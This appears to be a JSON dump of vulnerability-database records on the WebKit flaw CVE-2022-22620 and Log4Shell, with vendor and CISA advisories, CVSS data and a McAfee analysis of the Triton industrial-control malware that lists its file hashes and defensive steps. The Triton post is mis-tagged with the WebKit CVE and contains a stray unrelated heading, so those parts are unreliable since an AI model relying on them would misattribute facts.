"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-21T06:52:19", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-04-12T12:43:40", "id": "VERACODE:34313", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34313/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-03-26T11:28:12", "description": "CISA has added one new vulnerability to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerability listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n \nCVE-2022-22620\n\n| \n\nApple Webkit Remote Code Execution Vulnerability\n\n| \n\n2/25/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. 
CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/02/11/cisa-adds-one-known-exploited-vulnerability-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-11T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T00:00:00", "id": "CISA:7135D71F3A4288760C8E71D4E553A3B4", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/02/11/cisa-adds-one-known-exploited-vulnerability-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-15T11:40:48", "description": 
"Ivanti has updated its [Log4j Advisory](<https://forums.ivanti.com/s/article/CVE-2021-44228-Java-logging-library-log4j-Ivanti-Products-Impact-Mapping?language=en_US>) with security updates for multiple products to address CVE-2021-44228. An unauthenticated attacker could exploit this vulnerability to take control of an affected system.\n\nCISA encourages users and administrators to review the Ivanti security advisories pages for [Avalanche](<https://forums.ivanti.com/s/article/CVE-2021-44228-Avalanche-Remote-code-injection-Log4j?language=en_US>); [File Director](<https://forums.ivanti.com/s/article/Apache-Log4j-Zero-Day-Vulnerability-and-Ivanti-File-Director-CVE-2021-44228?language=en_US>); and [MobileIron Core, MobileIron Sentry (Core/Cloud), and MobileIron Core Connector](<https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j>) and apply the necessary updates and workarounds.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T00:00:00", "type": "cisa", "title": "Ivanti Updates Log4j Advisory with Security Updates for Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T00:00:00", "id": "CISA:006B1DC6A817621E16EEB4560519A418", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/14/ivanti-updates-log4j-advisory-security-updates-multiple-products", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-11-27T15:37:31", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "alpinelinux", "title": "CVE-2022-22620", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "id": "ALPINE:CVE-2022-22620", "href": "https://security.alpinelinux.org/vuln/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T15:37:31", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. 
A website may be able to track sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "alpinelinux", "title": "CVE-2022-22594", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-28T16:40:00", "id": "ALPINE:CVE-2022-22594", "href": "https://security.alpinelinux.org/vuln/CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-11-26T02:03:49", "description": "A use-after-free vulnerability exists in Apple OS. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "checkpoint_advisories", "title": "Apple OS Use After Free (CVE-2022-22620)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-06-30T00:00:00", "id": "CPAI-2022-0325", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-11-27T15:25:01", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. 
A website may be able to track sensitive user information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-31T20:47:48", "type": "redhatcve", "title": "CVE-2022-22594", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2023-04-06T09:27:43", "id": "RH:CVE-2022-22594", "href": "https://access.redhat.com/security/cve/cve-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-27T15:24:38", "description": "A use-after-free vulnerability was found in WebKitGTK. The vulnerability occurs when processing HTML content in WebKit. 
This flaw allows a remote attacker to trick the victim into opening a specially crafted web page, triggering a use-after-free error and leading to the execution of arbitrary code on the system.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-21T10:46:56", "type": "redhatcve", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2023-04-06T09:27:50", "id": "RH:CVE-2022-22620", "href": "https://access.redhat.com/security/cve/cve-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2023-11-27T15:33:19", "description": "Fix accessibility not working when the Bubblewrap sandbox is enabled. Fix rendering of scrollbars when overlay scrollbars are disabled. Fix the build when the X11 support is disabled. Fix the build in a number of situations where the main OpenGL library is not called libGL or libgl, as is the case on systems that use libglvnd. Fix several crashes and rendering issues. Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited. A use after free issue was addressed with improved memory management. (CVE-2022-22620)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-18T10:15:30", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-18T10:15:30", "id": "MGASA-2022-0075", "href": "https://advisories.mageia.org/MGASA-2022-0075.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "trellix": [{"lastseen": "2018-11-08T00:00:00", "description": "# Triton Malware Spearheads Latest Attacks on Industrial Systems | McAfee Blogs\n\nThomas Roccia \u00b7 NOV 08, 2018\n\nMalware that attacks industrial control systems (ICS), such as the [Stuxnet campaign](<https://www.mcafee.com/enterprise/en-us/security-awareness/what-is-stuxnet.html>) in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. 
An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.\n\nICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.\n\nIn August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware\u2014dubbed Triton, Trisis, or HatMan\u2014attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.\n\nAfter gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an [accidental shutdown](<https://www.darkreading.com/attacks-breaches/triton-attacker-disrupts-ics-operations-while-botching-attempt-to-cause-physical-damage-/d/d-id/1330650>) of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. 
All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.\n\n## CVE-2022-22620: Apple finally gave something away for free!\n\nHistory of ICS malware \n\nIn 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.\n\nIn 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.\n\nBlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.\n\nIn 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet\u2019s. It is unclear if this was a proof of concept or a simple penetration-testing tool.\n\nIndustroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine\u2019s power grid.\n\nIn 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.\n\n\n\nICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. 
In 2018, a cryptocurrency miner struck a water utility in Europe.\n\nFacing widespread risks, critical infrastructures need a specific approach to stay safe.\n\n### Triton framework\n\nTriton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). An SIS is the last line of protection against a physical incident.\n\nThe attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.\n\nTo communicate with SIS controllers, the attackers reimplemented the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.\n\nNozomi Networks has created a [Wireshark dissector](<https://github.com/NozomiNetworks/tricotools>) that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. 
Triton requires the \u201crunning state\u201d of the controller to perform the next stages of the attack.\n\nIn the preceding screen Triconex replies to the request \u201cGet Control Program Status,\u201d which is sent by Triton.\n\nThe Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a Python script compiled into an executable. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the Python scripts required by Triton. Finally, two PowerPC shellcodes (PowerPC being the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.\n\nThe following schema shows the main modules of Triton:\n\nThe missing payload was not recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.\n\n### How to detect an unusual network connection\n\n[Nozomi Networks has created a script](<https://github.com/NozomiNetworks/tricotools>) that simulates a Triconex safety controller. We modified this script and ran it on a Raspberry Pi to create a cheap detector tool.\n\nThis inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and a siren. It also displays the IP address of the connection for further investigation.\n\nThe following picture shows how to connect the LED and buzzer.\n\n### Fighting ICS malware\n\nICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. 
ICSs are now exposed to connected environments they were not designed for.\n\nStandard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.\n\nFurther security recommendations:\n\n * Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and two-factor authentication, card readers, surveillance cameras, etc.\n * Use a DMZ and firewalls to prevent network traffic from passing between the corporate and the ICS network\n * Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges\n * Log and monitor every action on the ICS network to quickly identify a point of failure\n * When possible, implement redundancy on critical devices to avoid major issues\n * Develop strong security policies and an incident response plan to restore systems during an incident\n * Train staff with simulated incident response exercises and security awareness programs\n\nAttackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. 
Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.\n\n### Indicators of compromise\n\n * dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe\n * b47ad4840089247b058121e95732beb82e6311d0: imain.bin\n * f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin\n * 91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py\n * 1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip\n * 97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc\n * d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc\n * 66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc\n * a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc\n * 2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc\n * 9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc\n * 6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc\n * 25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc\n\n### References\n\n * <https://blog.schneider-electric.com/cyber-security/2018/08/07/one-year-after-triton-building-ongoing-industry-wide-cyber-resilience/>\n * <https://www.youtube.com/watch?v=f09E75bWvkk>\n * <https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf>\n * <https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>\n * <https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware>\n * <https://www.nozominetworks.com/2018/07/18/blog/new-triton-analysis-tool-wireshark-dissector-for-tristation-protocol/>\n * <https://github.com/NozomiNetworks/tricotools>\n * 
<https://cyberx-labs.com/en/blog/triton-post-mortem-analysis-latest-ot-attack-framework/>\n * <https://vimeo.com/275906105>\n * <https://vimeo.com/248057640>\n * <https://blog.talosintelligence.com/2017/07/template-injection.html>\n * <https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN>\n", "cvss3": {}, "published": "2018-11-08T00:00:00", "type": "trellix", "title": "Triton Malware Spearheads Latest Attacks on Industrial Systems | McAfee Blogs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2018-11-08T00:00:00", "id": "TRELLIX:4EE3028711C16E3513FC2CF300440452", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/triton-malware-spearheads-latest-generation-of-attacks-on-industrial-systems.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2022-02-11T13:30:28", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here. A third zero-day vulnerability has been identified in macOS Monterey in 2022, following the two zero-day bugs discovered earlier in the year. This flaw impacts the WebKit component, a cross-platform web browser engine that is predominantly used in Safari. This vulnerability, tracked as CVE-2022-22620, exists due to a use-after-free error when processing HTML content in WebKit. The attacker can exploit this vulnerability by luring users to visit a specially crafted web page. Once a user opens the malicious web page, the attacker can remotely execute malicious code on the targeted system. In case of an attack where code injection and execution are successful, the behavior of the target machine is entirely dependent on the intended purpose of the injected code. This vulnerability is being exploited in the wild and we suggest organizations upgrade to macOS Monterey 12.2.1. 
Potential MITRE ATT&CK TTPs are: TA0001: Initial Access; TA0002: Execution; T1204: User Execution; T1189: Drive-by Compromise; T1190: Exploit Public-Facing Application; T1203: Exploitation for Client Execution; T1204.001: User Execution: Malicious Link. Patch link: https://support.apple.com/en-us/HT213092. Reference: https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html", "cvss3": {}, "published": "2022-02-11T13:02:14", "type": "hivepro", "title": "Zero-day vulnerability in WebKit affects Apple macOS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T13:02:14", "id": "HIVEPRO:2A4C96F3CDC5144909A1C1EA5E182515", "href": "https://www.hivepro.com/zero-day-vulnerability-in-webkit-affects-apple-macos/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-19T12:29:38", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The Monti ransomware infiltrated the client's internet-facing VMware Horizon virtualization system by exploiting the well-known "Log4Shell" vulnerability, a.k.a. CVE-2021-44228. 
Furthermore, the threat actor employed a commercial, cloud-based remote monitoring and maintenance (RMM) platform named Action1, which has never been used in a ransomware campaign before.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-16T10:51:13", "type": "hivepro", "title": "Monti ransomware infiltrates networks via the well-known Log4Shell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-16T10:51:13", "id": "HIVEPRO:753BDE83C1D82672DBEDB937144E1598", "href": "https://www.hivepro.com/monti-ransomware-infiltrates-networks-via-the-well-known-log4shell/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2023-11-27T15:02:49", "description": "Posted by Maddie Stone, Google Project Zero\n\nWhenever there\u2019s a new in-the-wild 0-day disclosed, I\u2019m very interested in understanding the root cause of the bug. This allows us to then understand if it was fully fixed, look for variants, and brainstorm new mitigations. 
